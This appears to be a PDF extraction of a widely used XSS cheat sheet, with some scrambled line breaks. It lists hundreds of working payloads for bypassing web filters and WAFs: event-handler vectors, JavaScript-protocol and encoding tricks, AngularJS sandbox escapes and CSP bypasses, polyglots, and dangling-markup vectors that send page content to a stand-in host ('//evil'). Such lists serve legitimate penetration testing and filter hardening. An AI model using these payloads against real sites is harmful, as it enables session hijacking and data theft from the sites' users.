Cross-site scripting (XSS) cheat sheet

This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or
browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2020. Last updated: Tue, 14 Jan 2020 15:56:36 +0000.

Event handlers

Event handlers that do not require user interaction

Event: Description: Code:

onactivate
Compatibility: Fires when the element is activated <a id=x tabindex=1 onactivate=alert(1)></a>

onafterprint
Compatibility: Fires after the page is printed <body onafterprint=alert(1)>

onanimationcancel
Compatibility: Fires when a CSS animation cancels <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target
{animation:10s ease-in-out 0s 1 x;}</style><a id=x
style="position:absolute;" onanimationcancel="alert(1)"></a>

onanimationend
Compatibility: Fires when a CSS animation ends <style>@keyframes x{}</style><a style="animation-name:x"
onanimationend="alert(1)"></a>

onanimationiteration
Compatibility: Fires when a CSS animation repeats <style>@keyframes slidein {}</style><a style="animation-
duration:1s;animation-name:slidein;animation-iteration-count:2"
onanimationiteration="alert(1)"></a>

onanimationstart
Compatibility: Fires when a CSS animation starts <style>@keyframes x{}</style><a style="animation-name:x"
onanimationstart="alert(1)"></a>

onbeforeactivate
Compatibility: Fires before the element is activated <a id=x tabindex=1 onbeforeactivate=alert(1)></a>

onbeforedeactivate
Compatibility: Fires before the element is deactivated <a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>

onbeforeprint
Compatibility: Fires before the page is printed <body onbeforeprint=alert(1)>

onbeforeunload
Compatibility: Fires after if the url changes <body onbeforeunload="location='javascript:alert(1)'">

onbegin
Compatibility: Fires when a svg animation begins <svg><animate onbegin=alert(1) attributeName=x dur=1s>

onblur
Compatibility: Fires when an element loses focus <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
onbounce
Compatibility: Fires when the marquee bounces <marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>

oncanplay
Compatibility: Fires if the resource can be played <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav">
</audio>

oncanplaythrough
Compatibility: Fires when enough data has been loaded <video oncanplaythrough=alert(1)><source src="validvideo.mp4"
type="video/mp4"></video>
to play the resource all the way through

ondeactivate
Compatibility: Fires when the element is deactivated <a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>

onend
Compatibility: Fires when a svg animation ends <svg><animate onend=alert(1) attributeName=x dur=1s>

onended
Compatibility: Fires when the resource is finished <audio controls autoplay onended=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>
playing

onerror
Compatibility: Fires when the resource fails to load or <audio src/onerror=alert(1)>
causes an error

onfinish
Compatibility: Fires when the marquee finishes <marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>

onfocus
Compatibility: Fires when the element has focus <a id=x tabindex=1 onfocus=alert(1)></a>

onfocusin
Compatibility: Fires when the element has focus <a id=x tabindex=1 onfocusin=alert(1)></a>

onfocusout
Compatibility: Fires when an element loses focus <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>

onhashchange
Compatibility: Fires if the hash changes <body onhashchange="alert(1)">

onload
Compatibility: Fires when the element is loaded <svg><a onload=alert(1)></a>

onloadeddata
Compatibility: Fires when the first frame is loaded <audio onloadeddata=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onloadedmetadata
Compatibility: Fires when the meta data is loaded <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav"
type="audio/wav"></audio>

onloadend
Compatibility: Fires when the element finishes loading <image src=validimage.png onloadend=alert(1)>
onloadstart
Compatibility: Fires when the element begins to load <image src=validimage.png onloadstart=alert(1)>

onmessage
Compatibility: Fires when message event is received <body onmessage=alert(1)>
from a postMessage call

onpageshow
Compatibility: Fires when the page is shown <body onpageshow=alert(1)>

onplay
Compatibility: Fires when the resource is played <audio autoplay onplay=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onplaying
Compatibility: Fires the resource is playing <audio autoplay onplaying=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onpopstate
Compatibility: Fires when the history changes <body onpopstate=alert(1)>

onreadystatechange
Compatibility: Fires when the ready state changes <applet onreadystatechange=alert(1)></applet>

onrepeat
Compatibility: Fires when a svg animation repeats <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />

onresize
Compatibility: Fires when the window is resized <body onresize="alert(1)">

onscroll
Compatibility: Fires when the page scrolls <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

onstart
Compatibility: Fires when the marquee starts <marquee onstart=alert(1)>XSS</marquee>

ontimeupdate
Compatibility: Fires when the timeline is changed <audio controls autoplay ontimeupdate=alert(1)><source
src="validaudio.wav" type="audio/wav"></audio>

ontoggle
Compatibility: Fires when the details tag is expanded <details ontoggle=alert(1) open>test</details>

ontransitioncancel
Compatibility: Fires when a CSS transition cancels <style>:target {color: red;}</style><a id=x style="transition:color 10s"
ontransitioncancel=alert(1)></a>

ontransitionend
Compatibility: Fires when a CSS transition ends <style>:target {color:red;}</style><a id=x style="transition:color 1s"
ontransitionend=alert(1)></a>
ontransitionrun
Compatibility: Fires when a CSS transition begins <style>:target {transform: rotate(180deg);}</style><a id=x
style="transition:transform 2s" ontransitionrun=alert(1)></a>

onunhandledrejection
Compatibility: Fires when a promise isn't handled <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>

onwaiting
Compatibility: Fires when while waiting for the data <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4"
type=video/mp4></video>

Event handlers that do require user interaction

Event: Description: Code:

onauxclick
Compatibility: Fires when right clicking or using the <input onauxclick=alert(1)>
middle button of the mouse

onbeforecopy
Compatibility: Requires you copy a piece of text <a onbeforecopy="alert(1)" contenteditable>test</a>

onbeforecut
Compatibility: Requires you cut a piece of text <a onbeforecut="alert(1)" contenteditable>test</a>

onbeforepaste
Compatibility: Requires you paste a piece of text <a onbeforepaste="alert(1)" contenteditable>test</a>

onchange
Compatibility: Requires as change of value <input onchange=alert(1) value=xss>

onclick
Compatibility: Requires a click of the element <a onclick="alert(1)">test</a>

oncontextmenu
Compatibility: Triggered when right clicking to show the <a oncontextmenu="alert(1)">test</a>
context menu

oncopy
Compatibility: Requires you copy a piece of text <a oncopy="alert(1)" contenteditable>test</a>

oncut
Compatibility: Requires you cut a piece of text <a oncut="alert(1)" contenteditable>test</a>

ondblclick
Compatibility: Triggered when double clicking the <a ondblclick="alert(1)">test</a>
element

ondrag
Compatibility: Triggered dragging the element <a draggable="true" ondrag="alert(1)">test</a>

ondragend
Compatibility: Triggered dragging is finished on the <a draggable="true" ondragend="alert(1)">test</a>
 element

ondragenter
Compatibility: Requires a mouse drag <a draggable="true" ondragenter="alert(1)">test</a>

ondragleave
Compatibility: Requires a mouse drag <a draggable="true" ondragleave="alert(1)">test</a>

ondragover
Compatibility: Triggered dragging over an element <div draggable="true" contenteditable>drag me</div><a ondragover=alert(1)
contenteditable>drop here</a>

ondragstart
Compatibility: Requires a mouse drag <a draggable="true" ondragstart="alert(1)">test</a>

ondrop
Compatibility: Triggered dropping a draggable element <div draggable="true" contenteditable>drag me</div><a ondrop=alert(1)
contenteditable>drop here</a>

oninput
Compatibility: Requires as change of value <input oninput=alert(1) value=xss>

oninvalid
Compatibility: Requires a form submission with an <form><input oninvalid=alert(1) required><input type=submit>
element that does not satisfy its
constraints such as a required attribute.

onkeydown
Compatibility: Triggered when a key is pressed <a onkeydown="alert(1)" contenteditable>test</a>

onkeypress
Compatibility: Triggered when a key is pressed <a onkeypress="alert(1)" contenteditable>test</a>

onkeyup
Compatibility: Triggered when a key is released <a onkeyup="alert(1)" contenteditable>test</a>

onmousedown
Compatibility: Triggered when the mouse is pressed <a onmousedown="alert(1)">test</a>

onmouseenter
Compatibility: Triggered when the mouse is hovered <a onmouseenter="alert(1)">test</a>
over the element

onmouseleave
Compatibility: Triggered when the mouse is moved <a onmouseleave="alert(1)">test</a>
away from the element

onmousemove
Compatibility: Requires mouse movement <a onmousemove="alert(1)">test</a>

onmouseout
Compatibility: Triggered when the mouse is moved <a onmouseout="alert(1)">test</a>
away from the element
onmouseover
Compatibility: Requires a hover over the element <a onmouseover="alert(1)">test</a>

onmouseup
Compatibility: Triggered when the mouse button is <a onmouseup="alert(1)">test</a>
released

onpaste
Compatibility: Requires you paste a piece of text <a onpaste="alert(1)" contenteditable>test</a>

onpause
Compatibility: Requires clicking the element to pause <audio autoplay controls onpause=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onpointerover
Compatibility: Fires when the mouseover <a onpointerover=alert(1)>XSS</a>

onpointerdown
Compatibility: Fires when the mouse down <a onpointerdown=alert(1)>XSS</a>

onpointerenter
Compatibility: Fires when the mouseenter <a onpointerenter=alert(1)>XSS</a>

onpointerleave
Compatibility: Fires when the mouseleave <a onpointerleave=alert(1)>XSS</a>

onpointermove
Compatibility: Fires when the mouse move <a onpointermove=alert(1)>XSS</a>

onpointerout
Compatibility: Fires when the mouse out <a onpointerout=alert(1)>XSS</a>

onpointerup
Compatibility: Fires when the mouse up <a onpointerup=alert(1)>XSS</a>

onreset
Compatibility: Requires a click <form onreset=alert(1)><input type=reset>

onsearch
Compatibility: Fires when a form is submitted and the <form><input type=search onsearch=alert(1) value="Hit return" autofocus>
input has a type attribute of search

onseeked
Compatibility: Requires clicking the element timeline <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onseeking
Compatibility: Requires clicking the element timeline <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>

onselect
Compatibility: Requires you select text <input onselect=alert(1) value="XSS" autofocus>
onsubmit
Compatibility: Requires a form submission <form onsubmit=alert(1)><input type=submit>

ontouchstart
Compatibility: Fires when the touch screen, only mobile <body ontouchstart=alert(1)>
device

ontouchend
Compatibility: Fires when the touch screen, only mobile <body ontouchend=alert(1)>
device

ontouchmove
Compatibility: Fires when the touch screen and move, <body ontouchmove=alert(1)>
only mobile device

onunload
Compatibility: Requires a click anywhere on the page <svg onunload=window.open('javascript:alert(1)')>
and a reload

onvolumechange
Compatibility: Requires volume adjustment <audio autoplay controls onvolumechange=alert(1)><source
src="validaudio.wav" type="audio/wav"></audio>

onwheel
Compatibility: Fires when you use the mouse wheel <body onwheel=alert(1)>

Restricted characters

No parentheses using exception handling <script>onerror=alert;throw 1</script>

No parentheses using exception handling no semi <script>{onerror=alert}throw 1</script>

colons

No parentheses using exception handling no semi <script>throw onerror=alert,1</script>

colons using expressions

No parentheses using exception handling and eval <script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval <script>

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x
on Firefox
281\x29'}</script>

No parentheses using ES6 hasInstance and <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

instanceof with eval

No parentheses using ES6 hasInstance and <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

instanceof with eval without .

No parentheses using location redirect <script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect no strings <script>location=name</script>

No parentheses using template strings <script>alert`1`</script>

No parentheses using template strings and location <script>new Function`X${document.location.hash.substr`1`}`</script>

hash
No parentheses or spaces, using template strings <script>Function`X${document.location.hash.substr`1`}```</script>
and location hash

Frameworks

Bootstrap onanimationstart event <xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event <xss class="carousel slide" data-ride=carousel data-interval=100

ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-
item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute JavaScript protocol <iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol <object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol <embed src="javascript:alert(1)">

A standard JavaScript protocol <a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive <a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol <a href=" javascript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed inside the <a href="javas cript:alert(1)">XSS</a>

protocol

Characters \x09,\x0a,\x0d are allowed after protocol <a href="javascript

:alert(1)">XSS</a>
name before the colon

Xlink namespace inside SVG with JavaScript <svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
protocol

SVG animate tag using values <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1)

/><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1)

to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1)

/><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src <script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag <svg><script href="data:text/javascript,alert(1)" />

SVG use element Chrome/Firefox <svg><use href="data:image/svg+xml,<svg id='x'

xmlns='http://www.w3.org/2000/svg'
xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a
xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100'
/></a></svg>#x"></use></svg>

Import statement with data URL <script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative <base href="javascript:/a/-alert(1)///////"><a

href=../lol/safari.html>test</a>
URLS

M thML k t li k bl <math><x href="javascript:alert(1)">blah

MathML makes any tag clickable <math><x href= javascript:alert(1) >blah

Button and formaction <form><button formaction=javascript:alert(1)>XSS

Input and formaction <form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action <form action=javascript:alert(1)><input type=submit value=XSS>

Isindex and formaction <isindex type=submit formaction=javascript:alert(1)>

Isindex and action <isindex type=submit action=javascript:alert(1)>

Use element with an external URL <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x"

/></svg>

Other useful attributes

Using srcdoc attribute <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, <form action="javascript:alert(1)"><input type=submit id=x></form><label
for=x>XSS</label>
even outside the form

Hidden inputs: Access key attributes can enable <input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X
on Windows) (CTRL+ALT+X on OS X)
XSS on normally unexploitable elements

Link elements: Access key attributes can enable <link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press
ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
XSS on normally unexploitable elements

Download attribute can save a copy of the current <a href=# download="filename.html">Test</a>
webpage

Disable referrer using referrerpolicy <img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open <a href=# onclick="window.open('http://subdomain1.portswigger-

labs.net/xss/xss.php?
function
context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via name attribute in a <iframe> <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?

context=js_string_single&x=%27;eval(name)//"></iframe>
tag

Set window.name via target attribute in a <base> tag <base target="alert(1)"><a href="http://subdomain1.portswigger-
labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via
target in base tag</a>

Set window.name via target attribute in a <a> tag <a target="alert(1)" href="http://subdomain1.portswigger-
labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via
target in a tag</a>

Set window.name via usemap attribute in a <img> <img src="validimage.png" width="10" height="10" usemap="#xss"><map
name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)"
tag
href="http://subdomain1.portswigger-labs.net/xss/xss.php?
context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag <form action="http://subdomain1.portswigger-labs.net/xss/xss.php"

target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input
type=hidden name=context value=js_string_single><input type="submit"
value="XSS via target in a form"></form>

Set window.name via formtarget attribute in a <form><input type=hidden name=x value="';eval(name)//"><input type=hidden
name=context value=js_string_single><input type="submit"
<input> tag type submit
formaction="http://subdomain1.portswigger-labs.net/xss/xss.php"
 formtarget="alert(1)" value="XSS via formtarget in input type submit">
</form>

Set window.name via formtarget attribute in a
<input> tag type image
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden
name=context value=js_string_single><input name=1 type="image"
src="validimage.png" formaction="http://subdomain1.portswigger-
labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in
input type image"></form>

Special tags

Redirect to a different domain <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7 <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7 <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-

script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the +/v8

+ADw-script+AD4-alert(1)+ADw-/script+AD4-
document) 1

UTF-7 BOM characters (Has to be at the start of the +/v9

+ADw-script+AD4-alert(1)+ADw-/script+AD4-
document) 2

UTF-7 BOM characters (Has to be at the start of the +/v+

+ADw-script+AD4-alert(1)+ADw-/script+AD4-
document) 3

UTF-7 BOM characters (Has to be at the start of the +/v/

+ADw-script+AD4-alert(1)+ADw-/script+AD4-
document) 4

Upgrade insecure requests <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-

requests">

Disable JavaScript via iframe sandbox <iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referer <meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8 %C0%BCscript>alert(1)</script>

%E0%80%BCscript>alert(1)</script>
%F0%80%80%BCscript>alert(1)</script>
%F8%80%80%80%BCscript>alert(1)</script>
%FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes <script>\u0061lert(1)</script>

Unicode escapes ES6 style <script>\u{61}lert(1)</script>

Unicode escapes ES6 style zero padded <script>\u{0000000061}lert(1)</script>

Hex encoding JavaScript escapes <script>eval('\x61lert(1)')</script>

Octal encoding <script>eval('\141lert(1)')</script>

<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon <a href="&#106;avascript:alert(1)">XSS</a><a

href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding <svg><script>&#97;lert(1)</script></svg>

<svg><script>&#x61;lert(1)</script></svg>
 <svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros <a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities <a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon provided next <a href="j&#x61vascript:alert(1)">XSS</a>

<a href="&#x6a
character is not a-f0-9
avascript:alert(1)">XSS</a>
<a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros <a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive <a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities <a href="javascript&colon;alert(1)">XSS</a>

<a href="java&Tab;script:alert(1)">XSS</a>
<a href="java&NewLine;script:alert(1)">XSS</a>
<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding <a href="javascript:x='%27-alert(1)-%27';">XSS</a>

HTML entities and URL encoding <a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>

Obfuscation

Firefox allows NULLS after & <a href="javascript&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities <a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening <!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
comments

Data protocol inside script src with base64 <script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Client-side template injection

AngularJS sandbox escapes reflected

Version: Author: Length: Vector:

1.0.1 - 1.1.5 Mario Heiderich (Cure53) 41 {{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 Gareth Heyes (PortSwigger) & 33 {{$on.constructor('alert(1)')()}}

(shorter) Lewis Ardern (Synopsys)

1.2.0 - 1.2.1 Jan Horn (Google) 122 {{a='constructor';b=

{};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a
.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 Gareth Heyes (PortSwigger) 23 {{{}.")));alert(1)//"}}

1.2.6 - 1.2.18 Jan Horn (Google) 106 {{(_=''.sub).call.call({}

[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'ale
rt(1)')()}}

1.2.19 - 1.2.23 Mathias Karlsson (Detectify) 124 {{toString.constructor.prototype.toString=toString.constructor.prototy

pe.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 Gareth Heyes (PortSwigger) 23 {{{}.")));alert(1)//"}}

1.2.27- Gareth Heyes (PortSwigger) 23 {{{}.")));alert(1)//"}}

1.2.29/1.3.0-
1.3.20

1.3.0 Gábor Molnár (Google) 272 {{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
)));}}

1.3.3 - 1.3.18 Gareth Heyes (PortSwigger) 128 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=

[].join;'a'.constructor.prototype.charAt=
[].join;$eval('x=alert(1)//');}}

1.3.19 Gareth Heyes (PortSwigger) 102 {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=

[].join;$eval('x=alert(1)//');}}

1.3.20 Gareth Heyes (PortSwigger) 65 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger) 74 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} }

};alert(1)//');}}

1.5.0 - 1.5.8 Ian Hickey & Gareth Heyes 79 {{x={'y':''.constructor.prototype};x['y'].charAt=

[].join;$eval('x=alert(1)');}}
(PortSwigger)

1.5.9 - 1.5.11 Jan Horn (Google) 517 {{

c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}

>=1.6.0 Mario Heiderich (Cure53) 41 {{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter) Gareth Heyes (PortSwigger) & 33 {{$on.constructor('alert(1)')()}}

Lewis Ardern (Synopsys)

DOM based AngularJS sandbox escapes (Using orderBy or no $eval)

Version: Author: Length: Vector:

1.0.1 - 1.1.5 Mario Heiderich (Cure53) 37 constructor.constructor('alert(1)')()

1.2.0 - 1.2.18 Jan Horn (Google) 118 a='constructor';b=

{};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a
.sub),a).value,0,'alert(1)')()

1.2.19 - 1.2.23 Mathias Karlsson (Detectify) 119 toString.constructor.prototype.toString=toString.constructor.prototype

.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26 Gareth Heyes (PortSwigger) 317 {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}

[['__proto__']]['x'];{}[['__proto__']]
['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]
['z']=constructor.defineProperty;d={}[['__proto__']]
 ['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}
[['__proto__']]['y'].value('alert(1)')()

1.2.27- Gareth Heyes (PortSwigger) 20 {}.")));alert(1)//";

1.2.29/1.3.0-
1.3.20

1.4.0-1.4.5 Gareth Heyes (PortSwigger) 75 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} }

};alert(1)//';

>=1.6.0 Mario Heiderich (Cure53) 37 constructor.constructor('alert(1)')()

1.4.4 (without Gareth Heyes (PortSwigger) 134 toString().constructor.prototype.charAt=[].join;

[1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11
strings)
4,116,40,49,41)

AngularJS CSP bypasses

Version: Author: Length: Vector:

All versions Gareth Heyes (PortSwigger) 81 <input autofocus ng-

focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
(Chrome)

All versions Gareth Heyes (PortSwigger) 56 <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

(Chrome)
shorter

All versions (all Gareth Heyes (PortSwigger) 91 <input autofocus ng-

focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'"
browsers)
>
shorter

1.2.0 - 1.5.0 Eduardo Vela (Google) 190 <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div>
<div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">
{{ [1].reduce(value.alert, 1); }}</div></div></div>

Scriptless attacks

Dangling markup
Background attribute <body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?

Link href stylesheet <link rel=stylesheet href="//evil?

Link href icon <link rel=icon href="//evil?

Meta refresh <meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute <img src="//evil?

<image src="//evil?

Video using track element <video><track default src="//evil?

Video using source element and src attribute <video><source src="//evil?

Audio using source element and src attribute <audio><source src="//evil?

Input src <input type=image src="//evil?

Button using formaction <form><button style="width:100%;height:100%" type=submit
formaction="//evil?

Input using formaction <form><input type=submit value="XSS" style="width:100%;height:100%"

type=submit formaction="//evil?

Form using action <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Isindex using src attribute <isindex type=image src="//evil?

Isindex using submit <isindex type=submit style=width:100%;height:100%; value=XSS

formaction="//evil?

Object data <object data="//evil?

Iframe src <iframe src="//evil?

Embed src <embed src="//evil?

Use textarea to consume markup and post to <form><button formaction=//evil>XSS</button><textarea name=x>

external site

Pass markup data through window.name using form <button form=x>XSS</button><form id=x action=//evil target='
target

Pass markup data through window.name using base <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html>

<font size=100 color=red>You must click me</font></a><base target="
target

Pass markup data through window.name using <form><input type=submit value="Click me"
formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html
formtarget
formtarget="

Using base href to pass data <a href=abc style="width:100%;height:100%;position:absolute;font-

size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html
name="
page

Using iframe window name to pass data from the <iframe src=http://subdomain1.portswigger-
labs.net/dangling_markup/name.html name="
page

Using object window name to pass data from the <object data=http://subdomain1.portswigger-
labs.net/dangling_markup/name.html name="
page

Using frame window name to pass data from the <frameset><frame src=http://subdomain1.portswigger-
labs.net/dangling_markup/name.html name="
page

Polyglots

Polyglot payload 1 javascript:/*--></title></style></textarea></script></xmp>

<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2 javascript:"/*'/*`/*--></noscript></title></textarea></style></template>

</noembed></script><html \"
onmouseover=/*&lt;svg/*/onload=alert()//>

WAF bypass global objects

Reflected XSS into a JavaScript string: string ';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//

concatenation (window)
Reflected XSS into a JavaScript string: string ';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
concatenation (self)

Reflected XSS into a JavaScript string: string ';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//

concatenation (this)

Reflected XSS into a JavaScript string: string ';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//

concatenation (top)

Reflected XSS into a JavaScript string: string ';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//

concatenation (parent)

Reflected XSS into a JavaScript string: string ';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//

concatenation (frames)

Reflected XSS into a JavaScript string: string ';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//

concatenation (globalThis)

Reflected XSS into a JavaScript string: comment ';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]

['domain']);//
syntax (window)

Reflected XSS into a JavaScript string: comment ';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//

syntax (self)

Reflected XSS into a JavaScript string: comment ';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//

syntax (this)

Reflected XSS into a JavaScript string: comment ';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//

syntax (top)

Reflected XSS into a JavaScript string: comment ';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]

['domain']);//
syntax (parent)

Reflected XSS into a JavaScript string: comment ';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]

['domain']);//
syntax (frames)

Reflected XSS into a JavaScript string: comment ';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]

['domain']);//
